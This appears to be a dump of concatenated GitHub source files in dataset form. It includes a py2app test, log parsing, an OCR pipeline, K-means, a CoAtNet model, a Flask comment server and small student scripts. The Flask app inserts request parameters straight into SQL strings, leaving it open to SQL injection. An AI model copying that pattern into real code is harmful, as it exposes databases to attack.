\"Contents\", \"Resources\"\n )\n\n for src_path, dst_path, chk_link in [\n (\"data1/file1.txt\", \"sub1/file1.txt\", True),\n (\"data1/file2.txt\", \"sub1/file2.txt\", True),\n (\"data1/file3.sh\", \"sub1/file3.sh\", True),\n (\"data2/source.c\", \"data2/source.c\", False),\n ]:\n src_file = os.path.join(self.app_dir, src_path)\n dst_file = os.path.join(resource_dir, dst_path)\n\n self.assertTrue(os.path.exists(dst_file))\n\n self.assertContentsEqual(src_file, dst_file)\n\n if chk_link and \"--alias\" in self.py2app_args:\n self.assertTrue(\n os.path.islink(dst_file), f\"{dst_file} is not a symlink\"\n )\n\n # if '--alias' in self.py2app_args:\n # self.assertTrue(os.path.islink(os.path.join(resource_dir, 'data2')))\n\n\nclass TestBasicAliasApp(TestBasicApp):\n py2app_args = [\n \"--alias\",\n ]\n\n\nclass TestBasicSemiStandaloneApp(TestBasicApp):\n py2app_args = [\n \"--semi-standalone\",\n ]\n","repo_name":"ronaldoussoren/py2app","sub_path":"py2app_tests/test_app_resources.py","file_name":"test_app_resources.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"19"} +{"seq_id":"40537926539","text":"#!/usr/bin/python3\n\nimport re\nimport sys\nimport csv\n\nlineasfile = sys.argv[1]\n\ndef openfile_errors(lineasfile):\n with open(lineasfile) as f:\n conteo = {}\n i = 0\n for line in f:\n pattern = \"([A-Z]+) ([a-zA-Z \\.\\']+) \" \n response = re.search(pattern,line)\n if response.group(1) == \"ERROR\":\n var_value = conteo.get(response.group(2))\n if var_value is None:\n var_value = 0\n conteo[response.group(2)] = var_value + 1\n conteo_values = sorted(conteo.values(),reverse=True)\n conteo_sorted = {}\n for i in conteo_values:\n for k in conteo.keys():\n if conteo[k] == i:\n conteo_sorted[k] = conteo[k]\n return conteo_sorted\ndef list_csv(conteo_sorted):\n list_errors = []\n for error, count in conteo_sorted.items():\n dict_new = {}\n dict_new[\"Error\"] = error\n dict_new[\"Count\"] = count\n list_errors.append(dict_new)\n return list_errors\n\ndef create_csv(list_errors):\n names_field = ['Error', 'Count']\n with open('error_message.csv', 'w') as error_message:\n writer = csv.DictWriter(error_message, fieldnames=names_field)\n writer.writeheader()\n writer.writerows(list_errors)\n\ncreate_csv(list_csv(openfile_errors(lineasfile))) \n","repo_name":"pkill2913/Coursera_python","sub_path":"tallerfinal.py","file_name":"tallerfinal.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74452475563","text":"import os\nimport time\nimport torch\nfrom PIL import Image\nimport multiprocessing\nimport threading\n\nfrom transformers import ViTForImageClassification, ViTImageProcessor\n# from paddleocr import PaddleOCR, draw_ocr\nimport easyocr\nfrom logger import logger_model_2, logger_model_2_rate\nfrom request import Request\n\nmodel_2_lock = multiprocessing.Lock()\n\nclass Model_2(multiprocessing.Process):\n def __init__(self, id, car_frames_list, draw_message_list, end_signal, to_monitor_rate):\n super().__init__()\n self.id = id\n self.car_frames_list = car_frames_list\n self.draw_message_list = draw_message_list\n self.end_signal = end_signal\n \n self.device = None\n self.model = None\n self.processor = None\n\n self.reader = None\n\n self.timer_logger_model_2 = time.time()\n self.to_monitor_rate = to_monitor_rate\n\n def run(self):\n self.device = torch.device(\"cuda:0\")\n # self.processor = ViTImageProcessor.from_pretrained('google/vit-base-patch16-224')\n # self.model = ViTForImageClassification.from_pretrained('google/vit-base-patch16-224').to(self.device)\n self.reader = easyocr.Reader(['ch_sim', 'en'], gpu=True)\n\n self.end_signal.value += 1\n\n # if self.id == 1:\n # thread_monitor_rate = threading.Thread(target=self.monitor_rate)\n # thread_monitor_rate.start()\n\n print(f\"[Model_2_{self.id}] start\")\n logger_model_2.info(f\"[Model_2_{self.id}] start\")\n\n # threads = []\n\n while True:\n time.sleep(0.01)\n # car_frame = None\n with model_2_lock:\n request = self.car_frames_list.get()\n if request.signal == -1:\n self.car_frames_list.put(request) # put the end signal back\n print(f\"[Model_2_{self.id}] end\")\n logger_model_2.info(f\"[Model_2_{self.id}] end\")\n self.end_signal.value -= 1\n # print(f\"[Model_2_{self.id}] self.end_signal.value: {self.end_signal.value}\")\n logger_model_2.info(f\"[Model_2_{self.id}] self.end_signal.value: {self.end_signal.value}\")\n if self.end_signal.value == 0:\n self.draw_message_list.put(request) # TODO\n break\n \n if time.time() - self.timer_logger_model_2 > 5:\n # print(f\"[Model_2_{self.id}] frame_filename: \", frame[1])\n logger_model_2.info(f\"[Model_2_{self.id}] frame_filename: {request.ids}, and car_frames_list: {self.car_frames_list.qsize()}\")\n self.timer_logger_model_2 = time.time()\n if isinstance(request, Request):\n # thread = threading.Thread(target=self.process_image, args=(request,)) # TODO\n # thread.start()\n # threads.append(thread)\n\n # if len(threads) > 16:\n # threads[0].join()\n # threads.pop(0)\n\n self.process_image(request)\n \n # for thread in threads:\n # thread.join()\n # threads = []\n\n def monitor_rate(self):\n rates = []\n sliding_window_size = 5\n last_car_frame = \"\"\n last_car_frames_list_len = 0\n while True:\n time.sleep(1e-6)\n with model_2_lock:\n if self.end_signal.value == 0:\n break\n try: \n if (len(self.car_frames_list) > 0 and self.car_frames_list[-1][1] != last_car_frame) or len(self.car_frames_list) > last_car_frames_list_len:\n self.to_monitor_rate.append(time.time())\n last_car_frame = self.car_frames_list[-1][1]\n last_car_frames_list_len = len(self.car_frames_list)\n except Exception as e:\n # logger_model_2.warning(f\"[Model_2_{self.id}] {e}, and car_frames_list[-1]: {self.car_frames_list[-1]}, and last_car_frame: {last_car_frame}\")\n ...\n\n if len(self.to_monitor_rate) > 1:\n rate = round((len(self.to_monitor_rate) - 1) / (self.to_monitor_rate[-1] - self.to_monitor_rate[0]), 3)\n rates.append(rate)\n if len(rates) > sliding_window_size:\n rates.pop(0)\n total_weight = sum(range(1, len(rates) + 1))\n weighted_sum = sum((i + 1) * rate for i, rate in enumerate(rates))\n moving_average = round(weighted_sum / total_weight, 3)\n # print(f\"[Model_2_{self.id}] rate: {moving_average}\")\n logger_model_2.info(f\"[Model_2_{self.id}] rate: {moving_average}\")\n logger_model_2_rate.info(f\"{moving_average}\")\n self.to_monitor_rate[:] = self.to_monitor_rate[-1:]\n \n def process_image_2(self, request):\n image_array, box, v_id, f_id, d_id = request.data, request.box, request.ids[0], request.ids[1], request.ids[2]\n\n box = [int(coord) for coord in box]\n\n image = Image.fromarray(image_array)\n cropped_image = image.crop(box)\n cropped_image_path = f'model_2_cache/image_{v_id}_{f_id}_{d_id}.jpg'\n cropped_image.save(cropped_image_path)\n\n # Paddleocr目前支持的多语言语种可以通过修改lang参数进行切换\n # 例如`ch`, `en`, `fr`, `german`, `korean`, `japan`\n ocr = PaddleOCR(use_angle_cls=True, lang=\"ch\") # need to run only once to download and load model into memory\n\n result = ocr.ocr(cropped_image_path, cls=True)\n car_number = ''\n scores = []\n score = 0\n label = None\n for idx in range(len(result)):\n res = result[idx]\n for line in res:\n print(line)\n car_number += line[1][0]\n scores.append(line[1][1])\n\n if len(scores) != 0:\n score = sum(scores) / len(scores)\n\n label = f\"{car_number}: {100 * score:.0f}%\"\n\n request_copy = request.copy()\n request_copy.label = label\n\n self.draw_message_list.put(request_copy) \n\n # print(f\"car_number: {car_number}\")\n # print(f\"score: {score}\")\n # print(f\"label: {label}\")\n\n os.remove(cropped_image_path)\n\n del image, cropped_image, ocr, result, car_number, scores, score, label, request_copy\n\n return cropped_image_path\n\n def process_image_1(self, request):\n image_array, box = request.data, request.box\n image = Image.fromarray(image_array)\n box = int(box[0]), int(box[1]), int(box[2]), int(box[3])\n cropped_image = image.crop(box)\n\n inputs = self.processor(images=cropped_image, return_tensors=\"pt\")\n inputs = {key: val.to(self.device) for key, val in inputs.items()} # move input data to GPU\n\n with torch.no_grad(): # execute model inference, make sure we do not compute gradients\n outputs = self.model(**inputs)\n\n logits = outputs.logits\n predicted_class_idx = logits.argmax(-1).item()\n predicted_class = self.model.config.id2label[predicted_class_idx]\n\n # Calculate score\n score = torch.softmax(logits, dim=-1)[0][predicted_class_idx].item() \n\n # import request\n # self.draw_message_list.append(Request(...))\n label = f\"{predicted_class}: {100 * score:.0f}%\"\n \n request_copy = request.copy()\n request_copy.label = label\n\n self.draw_message_list.put(request_copy)\n\n del image, cropped_image, inputs, outputs, logits, predicted_class_idx, predicted_class, score, label\n\n return\n \n def process_image(self, request):\n image_array, box, v_id, f_id, d_id = request.data, request.box, request.ids[0], request.ids[1], request.ids[2]\n\n box = [int(coord) for coord in box]\n\n image = Image.fromarray(image_array)\n cropped_image = image.crop(box)\n cropped_image_path = f'model_2_cache/image_{v_id}_{f_id}_{d_id}.jpg'\n cropped_image.save(cropped_image_path)\n\n # reader = easyocr.Reader(['ch_sim', 'en'], gpu=True) # need to run only once to load model into memory\n\n with torch.no_grad():\n result = self.reader.readtext(cropped_image_path)\n\n car_number = ''\n scores = []\n score = 0\n label = None\n for idx in range(len(result)):\n res = result[idx]\n # if res[2] < 0.5:\n # continue\n car_number += res[1]\n scores.append(res[2])\n\n if len(scores) != 0:\n score = sum(scores) / len(scores)\n\n label = f\"{car_number}: {100 * score:.0f}%\"\n\n # print(f\"car_number: {car_number}\")\n # print(f\"score: {score}\")\n # # print(f\"scores: {scores}\")\n # print(f\"label: {label}\")\n\n request_copy = request.copy()\n request_copy.label = label\n\n self.draw_message_list.put(request_copy) \n\n os.remove(cropped_image_path)\n\n del image, cropped_image, result, car_number, scores, score, label\n\n return\n","repo_name":"lifang535/traffic_monitoring_1","sub_path":"modules/model_2.py","file_name":"model_2.py","file_ext":"py","file_size_in_byte":9182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25060263717","text":"#Name:Aastha Giri\n#Student ID:0957366\n#Due Date: October 20th, 2019\n#MSITM 6341\n\nmenu_items = {\n\n 'Bacon Guacomole': 9.00,\n\n 'Baja Fish Tacos': 11.00,\n\n 'Seafood Enchiladas': 20.00,\n\n 'Grilled Tilapia': 24.00,\n\n 'Dumplings': 7.00,\n\n 'Cajetas' : 15.99\n\n}\n\nordered_items = {\n\n 'Bacon Guacomole',\n\n 'Nachos',\n\n 'Dumplings'\n\n}\n\n \n\ntotal=0\n\nfor item in ordered_items:\n\n if item in menu_items:\n\n print('{} : ${}'.format(item,menu_items[item]))\n\n total += menu_items[item]\n\n else:\n\n print(\"We do not have {}\".format(item))\n\nprint('---------------------')\n\nprint('Order Total : ${}'.format(total))","repo_name":"aastha123210/python","sub_path":"ASSIGNMENT/homework_assignment_6/resturant_order.py","file_name":"resturant_order.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18039056894","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# Kmeans.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: mli +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/12/08 17:04:24 by mli #+# #+# #\n# Updated: 2022/03/14 01:01:57 by mli ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport sys\nimport re # Regex\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass KmeansClustering:\n def __init__(self, max_iter=20, ncentroid=4):\n self.ncentroid = ncentroid # number of centroids\n self.max_iter = max_iter # number of max iterations to update the centroids\n self.centroids = [] # values of the centroids\n\n def fit(self, X: np.ndarray) -> None:\n \"\"\"\n Run the K-means clustering algorithm.\n For the location of the initial centroids, random pick ncentroids from the dataset.\n Args:\n X: has to be an numpy.ndarray, a matrice of dimension m * n.\n Returns:\n None.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n self.kmeans = KMeans(init='random',\n n_clusters=self.ncentroid,\n n_init=self.max_iter)\n self.kmeans.fit(X)\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict from wich cluster each datapoint belongs to.\n Args:\n X: has to be an numpy.ndarray, a matrice of dimension m * n.\n Returns:\n The prediction as a numpy.ndarray, a vector of dimension m * 1.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n self.cluster_labels = self.kmeans.predict(X)\n self.centroids = self.kmeans.cluster_centers_\n return self.centroids\n\n def fig_3D(self, X: np.ndarray) -> None:\n fig = plt.figure()\n ax = Axes3D(fig, auto_add_to_figure=False)\n fig.add_axes(ax)\n\n cluster_labels = self.cluster_labels\n cluster_centers = self.centroids\n\n ax.set_xlabel(\"Height\")\n ax.set_ylabel(\"Weight\")\n ax.set_zlabel(\"Bone Density\")\n\n colorstr = [\"red\", \"blue\", \"green\", \"purple\"]\n for i in range(self.ncentroid):\n mask = cluster_labels == i\n center = cluster_centers[i]\n color = colorstr[i] if (i < len(colorstr)) else None\n\n print(f'{sum(mask)} individuals for {color} centroid ({i}) with coordinates {center}')\n\n ax.scatter(X[mask, 0], X[mask, 1], X[mask, 2], color=color)\n ax.scatter(center[0], center[1], center[2], color=color,\n marker=\"o\", s=150, label=\"centroids\")\n plt.show()\n\nARGS_NAME = ['filepath', 'ncentroid', 'max_iter']\n\ndef parsing() -> list or None:\n if (len(sys.argv) != 4):\n return None\n args_regex = [\n rf\"^{ARGS_NAME[0]}=(.+\\.csv)$\",\n rf\"^{ARGS_NAME[1]}=(\\d+)$\",\n rf\"^{ARGS_NAME[2]}=(\\d+)$\",\n ]\n res = []\n\n for i, regex in enumerate(args_regex):\n search_obj = re.search(args_regex[i], sys.argv[i + 1])\n if (search_obj is None):\n return None\n res.append(search_obj.group(1))\n return res\n\ndef print_usage():\n print(f\"\"\"USAGE:\n python {sys.argv[0]} %s=PATH %s=NB %s=NB\nEXAMPLE:\n python {sys.argv[0]} %s=../resources/solar_system_census.csv %s=4 %s=30\n \"\"\" %(*ARGS_NAME, *ARGS_NAME))\n\ndef main():\n ARGV = parsing()\n if ARGV is None:\n print_usage()\n return\n try:\n data = np.genfromtxt(ARGV[0], delimiter=\",\", skip_header=1)\n except Exception as e:\n print(e)\n return\n\n X = data[:, 1:] # Delete index\n ncentroid = int(ARGV[1])\n max_iter = int(ARGV[2])\n\n kms = KmeansClustering(max_iter=max_iter ,ncentroid=ncentroid)\n kms.fit(X)\n kms.predict(X)\n kms.fig_3D(X)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mli42/python_bootcamp","sub_path":"day03/ex04/Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"25143583615","text":"import numpy as np \nimport pandas as pd \nimport os\ndataset = pd.read_csv('C:/Users/Tarun Methwani/Restaurant_Reviews.tsv', delimiter = '\\t', quoting = 3)\n#cleaning the text\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nimport nltk\nnltk.download('stopwords')\ncorpus = []\nfor i in range(0,1000):\n review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])\n review = review.lower()\n review = review.split()\n ps = PorterStemmer()\n review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]\n review = ' '.join(review)\n corpus.append(review)\n#CountVectorizer which converts the words in the dataset into 0 and 1\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import accuracy_score\ncv = CountVectorizer(max_features = 1500)\n\nX = cv.fit_transform(corpus).todense()\ny = dataset.iloc[:,1].values\n#splitting the dataset into the training set and testset\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X , y, test_size = 0.20, random_state = 0)\nfrom sklearn.naive_bayes import GaussianNB\nclassifier = GaussianNB()\nclassifier.fit(X_train, y_train)\ny_pred = classifier.predict(X_test)\nAccuracy_Score = accuracy_score(y_test, y_pred)\n\nfeedback = \"\"\n\nnewReview = \"\"\n\nnewReview = \"worst\"\ndef predict(new_review): \n\n new_review = re.sub(\"[^a-zA-Z]\", \" \", new_review) \n\n new_review = new_review.lower().split()\n\n new_review = [ps.stem(word) for word in new_review if word not in set(stopwords.words(\"english\"))] \n\n new_review = \" \".join(new_review) \n\n new_review = [new_review] \n\n new_review = cv.transform(new_review).toarray() \n\n if classifier.predict(new_review)[0] == 1:\n\n return \"Positive\" \n\n else: \n\n return \"Negative\"\n\n \n\nfeedback = predict(newReview)\n\nprint(\"This review is: \", feedback) \nprint(\"Accuracy Score is :\", Accuracy_Score)","repo_name":"Tarun-Methwani/Restaurant-review-webapp","sub_path":"data/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26187688454","text":"from keras import Model, layers\nfrom customs.customblocks import ResidualBlock, STEMBlock, FFNBlock, MBConvBlock, MSHABlock, OutputBlock\n\nclass CoAtNet(Model):\n def __init__(self, \n num_classes, \n num_blocks=[2, 3, 5, 2],\n out_channels=[96, 192, 384, 768],\n expansion_rate=4, \n se_ratio=0.25,\n sthotastic_depth_rate=0,\n drop_connect_rate=0,\n drop_rate=0,\n block_types=[\"convulution\",\"convulution\",\"transformer\",\"transformer\"],\n strides=[2,2,2,2],\n head_dimension=32,\n stem_filters=64,\n stem_strides=2,\n activation='gelu',\n classifier_activation = 'softmax',\n use_dw_strides=True\n ):\n \n super().__init__()\n \n assert len(num_blocks) == len(out_channels) == len(block_types) == len(strides) \n \n self.stem_block = STEMBlock(stem_filters, activation=activation, strides=stem_strides)\n \n global_block_id = 0\n self.blocks = []\n total_blocks = sum(num_blocks)\n for stack_id, (num_block, out_channel, block_type) in enumerate(zip(num_blocks, out_channels, block_types)):\n stack_stride = strides[stack_id]\n is_conv_block = True if block_type[0].lower() == \"c\" else False\n if is_conv_block: stack_se_ratio = se_ratio[stack_id] if isinstance(se_ratio, list) else se_ratio\n for block_id in range(num_block):\n block_stride = stack_stride if block_id == 0 else 1\n block_conv_short_cut = True if block_id == 0 else False\n if is_conv_block: block_se_ratio = stack_se_ratio[block_id] if isinstance(stack_se_ratio, list) else stack_se_ratio\n block_drop_rate = drop_connect_rate * global_block_id / total_blocks\n global_block_id += 1\n\n if is_conv_block:\n blocks = (MBConvBlock(\n expansion_rate, out_channel, block_stride, block_se_ratio, use_dw_strides, activation=activation\n ),)\n else:\n blocks = (\n MSHABlock(\n out_channel, block_stride, head_dimension\n ),\n FFNBlock(\n expansion_rate, activation=activation\n )\n )\n \n for block in blocks: \n self.blocks.append(ResidualBlock(\n block, out_channel, block_stride, False if isinstance(block, FFNBlock) else block_conv_short_cut, \n block_drop_rate, sthotastic_depth_rate\n ))\n\n self.classification_output_block = OutputBlock(num_classes, drop_rate, classifier_activation)\n\n def call(self, inputs):\n x = self.stem_block(inputs)\n\n for block in self.blocks:\n x = block(x)\n\n return self.classification_output_block(x)\n\n\nfrom tensorflow_addons.optimizers import AdamW\nfrom keras import losses, metrics\nfrom keras_tuner import HyperModel, HyperParameters\nfrom functools import reduce\n\nclass CoAtNetHyperModel(HyperModel):\n def __init__(self, num_classes):\n super().__init__()\n \n self.num_classes = num_classes\n\n def build(self, hp :HyperParameters):\n # conv_num_blocks = hp.Int(\"conv_num_blocks\", 1, 2, 1)\n # transformer_num_blocks = hp.Int(\"conv_num_blocks\", 1, 2, 1)\n \n # strides = []\n # num_blocks = []\n # block_types = []\n\n # for num in range(conv_num_blocks):\n # num_blocks.append(hp.Int(f\"conv{num}_block_num\", 1, 2, 1) if num == 0 else hp.Int(f\"conv{num}_block_num\", num_blocks[-1]+1, 6, 1))\n # strides.append(2)\n # block_types.append('C')\n \n # for num in range(transformer_num_blocks):\n # num_blocks.append(hp.Int(f\"transformer{num}_block_num\", 1, 2, 1)) if num == 0 else num_blocks.insert(len(num_blocks)-1, hp.Int(f\"transformer{num}_block_num\", num_blocks[-1]+1, 7, 1))\n # strides.append(2)\n # block_types.append('T')\n\n\n # out_channels = [hp.Int(f\"conv{0}_block_out_channel\", 16, 96, 16)]\n # for _ in range(3):\n # out_channels.append(out_channels[-1] * 2)\n \n # print(num_blocks, out_channels, block_types, strides)\n model = CoAtNet(num_classes=self.num_classes, \n expansion_rate=3,\n se_ratio=0, \n # drop_connect_rate=hp.Float(\"drop_connect_rate\", 0, 0.99, 0.05), \n # drop_rate=hp.Float(\"drop_rate\", 0, 0.99, 0.05),\n num_blocks=[2, 7, 14, 2], \n # out_channels=[64, 128, 256, 512], \n # block_types=block_types, \n # strides=strides, \n stem_strides=1, \n # head_dimension=hp.Int(\"head_dimension\", 16, out_channels[1], 16), \n stem_filters=48, \n )\n \n model.compile(\n optimizer=AdamW(\n learning_rate= 0.0010478, #0.0010478, manuel1e-4\n weight_decay= 0.00024111430262138014),\n loss=losses.CategoricalCrossentropy(), #from_logits, label_smoothing\n metrics=[\n metrics.CategoricalAccuracy(name=\"accuracy\"),\n metrics.TopKCategoricalAccuracy(5, name=\"top-5-accuracy\"),\n ])\n \n return model\n \n def fit(self, hp, model, *args, **kwargs):\n batch_size=80\n return model.fit(\n *args,\n batch_size=batch_size,\n **kwargs,\n )","repo_name":"Keremm1/CoAtNet","sub_path":"attention_models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71595351402","text":"import turtle\n\n\ndef make_polygon(tur, nsides):\n if tur is None or nsides < 3:\n raise ValueError()\n turn_angle = 360/nsides\n for i in range(0,nsides):\n tur.left(turn_angle)\n tur.forward(100)\n\n\nt = turtle.Turtle()\n\n## Equilateral Triangle\n# sides = 3\n\n## Square\n# sides = 4\n\n## Hexagon\n# sides = 6\n\n## Octagon\nsides = 8\n\nmake_polygon(t,sides)\n\nturtle.mainloop()\n","repo_name":"FelipeCoimbra/CES-22-exerc","sub_path":"1bim/week1/exerc3_6.py","file_name":"exerc3_6.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32095514868","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 1 17:54:36 2020\r\n\r\n@author: lara-\r\n\"\"\"\r\n\r\n#Exercise 2\r\nimport keyword\r\ndef postal_code_validator(postal):\r\n if len(postal) == 8:\r\n i=0\r\n control = 0\r\n while (i < len(postal)):\r\n if i < 4:\r\n if postal[i].isnumeric() == False:\r\n #print(\"a\")\r\n #print(postal[i])\r\n #print(postal[i].isnumeric())\r\n print(\"Postal Code must have a hyphen separating the number in the fifth position\") \r\n print(\"The first four elements in postal code must be digits.\")\r\n print(\"The last 3 elements in postal code must be digits.\")\r\n control = 1\r\n break\r\n \r\n elif i == 4:\r\n if postal[i] != \"-\":\r\n #print(\"b\")\r\n print(\"Postal Code must have a hyphen separating the number in the fifth position\") \r\n print(\"The first four elements in postal code must be digits.\")\r\n print(\"The last 3 elements in postal code must be digits.\")\r\n control = 1\r\n break\r\n else:\r\n if postal[i].isnumeric() == False:\r\n #print(\"c\")\r\n print(\"Postal Code must have a hyphen separating the number in the fifth position\") \r\n print(\"The first four elements in postal code must be digits.\")\r\n print(\"The last 3 elements in postal code must be digits.\")\r\n control = 1\r\n break\r\n i += 1 \r\n if control == 0:\r\n print(\"Postal Code\", postal, \"is ok\")\r\n \r\n else:\r\n print(\"Postal Code length is wrong.\") \r\n \r\n \r\n\r\nzip_code = input(\"Postal Code: \")\r\npostal_code_validator(zip_code)","repo_name":"PP144gh/physics_code","sub_path":"python_ObjectOriented_exam/Group1_ex2.py","file_name":"Group1_ex2.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16426547155","text":"from flask import Flask, redirect, url_for, request\r\nfrom flask_cors import CORS,cross_origin\r\nimport sqlite3\r\napp = Flask(__name__)\r\n\r\n\r\ndef ins(time, content, ep, aid, source):\r\n conn = sqlite3.connect('danmu.db')\r\n c = conn.cursor()\r\n c.execute(\"INSERT INTO danmu (TIME,CONTENT,EP,SOURCE,AID) \\\r\n VALUES ({},'{}',{},{},{})\".format(time, content, ep, source, aid))\r\n conn.commit()\r\n c.close()\r\n\r\ndef get(ep,aid,source):\r\n conn = sqlite3.connect('danmu.db')\r\n c = conn.cursor()\r\n cursor = c.execute(\"SELECT time, content, SOURCE from danmu where aid={} and ep={} and source={}\".format(aid,ep,source))\r\n result = [{'time':i[0], 'content':i[1]} for i in cursor]\r\n cursor = c.execute(\"select source, count(*) from danmu where aid={} and ep={} group by source\".format(aid,ep))\r\n r2 = [{'source':i[0], 'counts':i[1]} for i in cursor]\r\n c.close()\r\n return result,r2\r\n\r\n\r\n@app.route('/')\r\n@cross_origin()\r\ndef hello():\r\n return 'Welcome to My Watchlist!'\r\n\r\n\r\n@app.route(\"/getdanmu\")\r\n@cross_origin()\r\ndef getdanmu():\r\n aid = request.args.get('aid')\r\n ep = request.args.get('ep')\r\n source = request.args.get(\"source\")\r\n data,meta = get(ep,aid,source)\r\n return {\"status\":0, \"data\": data, \"meta_info\":meta}\r\n\r\n@app.route(\"/senddanmu\", methods=['GET','POST'])\r\n@cross_origin()\r\ndef senddanmu():\r\n time = request.args.get('time')\r\n content = request.args.get('content')\r\n ep = request.args.get('ep')\r\n aid = request.args.get('aid')\r\n source = request.args.get('source')\r\n # print(time,content)\r\n # time = request.args.get(\"time\")\r\n # content = request.args.get(\"content\")\r\n ins(time,content,ep,aid,source)\r\n return {\"status\":0}\r\n\r\n\r\napp.run(host='0.0.0.0',port=5000, debug=True)\r\n","repo_name":"innnky/fengche-danmu","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24947364420","text":"import pymorphy2\nimport random\nimport os\n\ndef randomPhrase(nounList, adjList, count=1):\n # Load morph analyzer\n mp = pymorphy2.MorphAnalyzer()\n phrases = []\n\n for cnt in range(0, count):\n # Found random adj and noun from lists\n randNoun = random.choice(nounList)\n randAdj = random.choice(adjList)\n\n # Collect number and gender for inflect phrase\n for i in mp.parse(randNoun):\n if i.tag.POS == \"NOUN\" and i.tag.case == \"nomn\":\n # Unchangeable word\n if (\"Fixd\" in i.tag) == True:\n number = \"fixd\"\n # Only plural number\n elif (\"Pltm\" in i.tag) == True:\n number = \"plur\"\n # Only single number\n elif (\"Sgtm\" in i.tag) == True:\n number = \"sing\"\n # Randomize noun number\n else:\n number = random.choice((\"sing\", \"plur\"))\n\n # Change only gender on adj\n if number == \"sing\" or number == \"fixd\":\n gender = i.tag.gender\n if gender == None: gender = \"masc\"\n inflectVal = {gender}\n break\n # Change only number on noun and adj\n else:\n inflectVal = {number}\n # Change number of noun\n randNoun = i.inflect(inflectVal).word\n break\n\n # Inflect adj\n for i in mp.parse(randAdj):\n if i.tag.POS == \"ADJF\" and i.tag.case == \"nomn\":\n # Change number or gender of adj\n randAdj = i.inflect(inflectVal).word\n\n phrases.append(\"{} {}\".format(randAdj, randNoun))\n\n return phrases\n\nif __name__ == '__main__':\n # Script directory\n main_dir = os.path.split(os.path.abspath(__file__))[0]\n\n # Load nouns to list\n with open(os.path.join(main_dir, 'vocab/noun'), 'r', encoding='utf-8') as f:\n nouns = f.read().splitlines()\n\n # Load adjectives to list\n with open(os.path.join(main_dir, 'vocab/adj'), 'r', encoding='utf-8') as f:\n adjectives = f.read().splitlines()\n\n phrase = randomPhrase(nouns, adjectives, 10)\n print(phrase)","repo_name":"dAN0n/RandomPhrasesRu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23995198481","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n# set directory\r\nCFD100 = pd.ExcelFile(\"C:/users/arashjkh/desktop/ENGR491/SoftwareExercises/se2/Simulation100/Python/Cp_100.xlsx\")\r\nxp100 = CFD100.parse('xp')\r\nCFD1000 = pd.ExcelFile(\"C:/users/arashjkh/desktop/ENGR491/SoftwareExercises/se2/Simulation100/Python/Cp_1000.xlsx\")\r\nxp1000 = CFD1000.parse('xp')\r\n#FC = pd.ExcelFile(\"C:/users/arashjkh/desktop/ENGR491/SoftwareExercises/se2/FC.xlsx\")\r\n#FC = FC.parse('FC')\r\n#print(xp)\r\n\r\n\r\n# set plot\r\n#plt.plot(xp['x_0.02'], xp['p_0.02_2'], label='ss_lc=ps_lc=0.02; edge_lc=2 // cells=699')\r\n#plt.plot(xp['x_0.01'], xp['p_0.01_1'], label='ss_lc=ps_lc=0.01; edge_lc=1 // cells=2522')\r\n#plt.plot(xp['x_0.008'], xp['p_0.008_0.8'], label='ss_lc=ps_lc=0.008; edge_lc=0.8 // cells=3513')\r\n#plt.plot(xp['x_0.007'], xp['p_0.007_0.7'], label='ss_lc=ps_lc=0.007; edge_lc=0.7 // cells=4628')\r\n#plt.plot(xp['x_0.006'], xp['p_0.006_0.6'], label='ss_lc=ps_lc=0.006; edge_lc=0.6 // cells=5983')\r\n#plt.plot(xp['x_0.005'], xp['p_0.005_0.5'], label='ss_lc=ps_lc=0.005; edge_lc=0.5 // cells=7685')\r\n#plt.plot(xp['x_0.005'], xp['p_0.005_0.4'], label='ss_lc=ps_lc=0.005; edge_lc=0.4 // cells=9733')\r\n#plt.plot(xp100['x_0.004'], xp100['p_0.004_0.4'], label='ss_lc=ps_lc=0.004; edge_lc=0.4 // 